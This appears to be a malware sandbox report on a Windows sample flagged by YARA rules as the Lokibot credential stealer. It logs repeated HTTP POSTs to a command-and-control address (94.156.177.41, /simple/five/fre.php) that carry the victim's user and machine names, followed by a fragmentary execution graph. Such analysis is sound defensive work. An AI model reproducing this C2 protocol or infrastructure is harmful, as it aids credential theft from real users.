                                Jan 11, 2025 01:44:10.558794022 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:11.267416954 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:11 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                118192.168.2.85152194.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:11.423024893 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:11.428450108 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:12.275295973 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:12 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                119192.168.2.85153194.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:12.440880060 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:12.445729017 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:13.185780048 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:13 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                120192.168.2.85153794.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:13.347202063 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:13.353272915 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:14.053210020 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:13 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                121192.168.2.85154494.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:14.201705933 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:14.206617117 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:14.935020924 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:14 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                122192.168.2.85155094.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:15.083908081 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:15.088828087 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:15.838354111 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:15 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                123192.168.2.85155794.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:16.010884047 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:16.015685081 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:16.721132994 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:16 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                124192.168.2.85156594.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:16.865232944 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:16.870270014 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:17.604012966 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:17 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                125192.168.2.85157194.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:17.771429062 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:17.776453972 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:18.481522083 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:18 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                126192.168.2.85157794.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:18.900230885 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:18.905117035 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:19.611534119 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:19 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                127192.168.2.85158194.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:19.760009050 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:19.764965057 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:20.465841055 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:20 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                128192.168.2.85158294.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:20.620706081 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:20.625880957 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:21.591641903 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:21 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.
                                Jan 11, 2025 01:44:21.591734886 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:21 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                129192.168.2.85158394.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:21.732814074 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:21.737699986 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:22.440511942 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:22 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                130192.168.2.85158494.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:22.602380991 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:22.607372999 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:23.341622114 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:23 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                131192.168.2.85158594.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:23.511257887 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:23.517155886 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:24.227340937 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:24 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                132192.168.2.85158694.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:24.357515097 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:24.362510920 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:25.071022034 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:24 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                133192.168.2.85158794.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:25.202620029 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:25.207597971 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:25.895649910 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:25 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Target ID:0
                                Start time:19:42:18
                                Start date:10/01/2025
                                Path:C:\Users\user\Desktop\EozUxz4ybi.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\EozUxz4ybi.exe"
                                Imagebase:0x400000
                                File size:98'816 bytes
                                MD5 hash:E35101F489A8D1FD3B789335CBDDE45D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000000.1442441088.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp, Author: unknown
                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp, Author: unknown
                                • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000000.00000002.2698954196.000000000056E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:false

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:31%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:4.5%
                                  Total number of Nodes:1838
                                  Total number of Limit Nodes:92
                                  execution_graph 9687 40c640 9714 404bee 9687->9714 9690 404bee 6 API calls 9691 40c66b 9690->9691 9692 404bee 6 API calls 9691->9692 9699 40c708 9691->9699 9696 40c683 9692->9696 9693 402bab 2 API calls 9694 40c70f 9693->9694 9695 40c701 9698 402bab 2 API calls 9695->9698 9696->9695 9697 404bee 6 API calls 9696->9697 9702 40c694 9697->9702 9698->9699 9699->9693 9700 40c6f8 9701 402bab 2 API calls 9700->9701 9701->9695 9702->9700 9721 40c522 9702->9721 9704 40c6a9 9705 40c6ef 9704->9705 9707 405872 4 API calls 9704->9707 9706 402bab 2 API calls 9705->9706 9706->9700 9708 40c6c5 9707->9708 9709 405872 4 API calls 9708->9709 9710 40c6d5 9709->9710 9711 405872 4 API calls 9710->9711 9712 40c6e7 9711->9712 9713 402bab 2 API calls 9712->9713 9713->9705 9715 402b7c 2 API calls 9714->9715 9717 404bff 9715->9717 9716 404c3b 9716->9690 9716->9694 9717->9716 9718 4031e5 4 API calls 9717->9718 9719 404c28 9718->9719 9719->9716 9720 402bab 2 API calls 9719->9720 9720->9716 9722 402b7c 2 API calls 9721->9722 9723 40c542 9722->9723 9723->9704 9724 405941 9725 4031e5 4 API calls 9724->9725 9726 405954 9725->9726 8291 409046 8304 413b28 8291->8304 8293 40906d 8295 405b6f 6 API calls 8293->8295 8294 40904e 8294->8293 8296 403fbf 7 API calls 8294->8296 8297 40907c 8295->8297 8296->8293 8298 409092 8297->8298 8308 409408 8297->8308 8300 4090a3 8298->8300 8303 402bab 2 API calls 8298->8303 8302 402bab 2 API calls 8302->8298 8303->8300 8305 413b31 8304->8305 8306 413b38 8304->8306 8307 404056 6 API calls 8305->8307 8306->8294 8307->8306 8309 409413 8308->8309 8315 40908c 8309->8315 8322 409d36 8309->8322 8312 40945c 8428 40a35d 8312->8428 8315->8302 8323 409d43 8322->8323 8324 40a35d 4 API calls 8323->8324 8325 409d55 8324->8325 8326 4031e5 4 API calls 8325->8326 8327 409d8b 8326->8327 8328 4031e5 4 API calls 8327->8328 8329 409dd0 8328->8329 8330 405b6f 6 API calls 8329->8330 8361 409423 8329->8361 8333 409df7 8330->8333 8331 409e1c 8332 4031e5 4 API calls 8331->8332 8331->8361 8334 409e62 8332->8334 8333->8331 8335 402bab 2 API calls 8333->8335 8336 4031e5 4 API calls 8334->8336 8335->8331 8337 409e82 8336->8337 8338 4031e5 4 API calls 8337->8338 8339 409ea2 8338->8339 8340 4031e5 4 API calls 8339->8340 8341 409ec2 8340->8341 8342 4031e5 4 API calls 8341->8342 8343 409ee2 8342->8343 8344 4031e5 4 API calls 8343->8344 8345 409f02 8344->8345 8346 4031e5 4 API calls 8345->8346 8347 409f22 8346->8347 8348 4031e5 4 API calls 8347->8348 8351 409f42 8348->8351 8349 40a19b 8350 408b2c 4 API calls 8349->8350 8350->8361 8351->8349 8352 409fa3 8351->8352 8353 405b6f 6 API calls 8352->8353 8352->8361 8354 409fbd 8353->8354 8355 40a02c 8354->8355 8356 402bab 2 API calls 8354->8356 8357 4031e5 4 API calls 8355->8357 8383 40a16d 8355->8383 8359 409fd7 8356->8359 8360 40a070 8357->8360 8358 402bab 2 API calls 8358->8361 8362 405b6f 6 API calls 8359->8362 8363 4031e5 4 API calls 8360->8363 8361->8312 8384 4056bf 